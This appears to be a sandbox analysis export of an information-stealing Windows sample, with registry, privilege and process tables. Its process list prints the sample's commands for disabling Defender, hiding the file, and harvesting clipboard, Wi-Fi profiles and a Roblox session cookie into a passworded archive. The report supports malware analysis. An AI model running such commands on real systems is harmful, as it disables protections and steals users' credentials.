Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ = "IItemActivityCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler\ = "FileSyncClient AutoPlayHandler Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ = "IGetSelectiveSyncInformationCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\OOBERequestHandler.OOBERequestHandler.1 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\0\win64\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\AppID\OneDrive.EXE C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Runs ping.exe

Process: C:\Windows\system32\PING.EXE

Suspicious behavior: AddClipboardFormatListener

Process: C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Suspicious behavior: EnumeratesProcesses

Process (hits)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (22)
C:\Program Files\Google\Chrome\Application\chrome.exe (6)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe (2)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe (4)

Suspicious use of AdjustPrivilegeToken

Token enabled Process (hits)
SeDebugPrivilege C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (7)
SeDebugPrivilege C:\Windows\system32\tasklist.exe (4)

C:\Windows\System32\Wbem\WMIC.exe enables the same privilege set on each of its three invocations (the export stops after 64 rows, so the third listing is cut short in the source):
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege. WMIC enables every privilege present in its token when it starts, which is exactly what the list shows, so this block reflects the WMIC invocations behind "Detects videocard installed" rather than privilege escalation by the sample; none of these privileges is gained, only enabled, and the run is already in an administrator's session. SeDebugPrivilege is what tasklist.exe needs to enumerate processes in other sessions. Its seven enablements in powershell.exe are the one item here worth following up, because the PowerShell command lines are not reproduced in this export and the same privilege is needed to open other users' processes for the memory operations listed in the summary.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
PID 4308 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
PID 352 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4000 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2848 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3684 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3928 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4312 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4312 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 4816 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4816 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3432 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3432 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 352 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2296 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2020 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3776 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3776 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2220 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2220 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4284 wrote to memory of 1028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 1028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4840 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3328 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3328 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2136 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ​ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ​ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E9.tmp" "c:\Users\Admin\AppData\Local\Temp\mztqsn5r\CSCF4D9769ABFF04899BC49BE9CC0D64E8.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *

C:\Windows\system32\cmd.exe

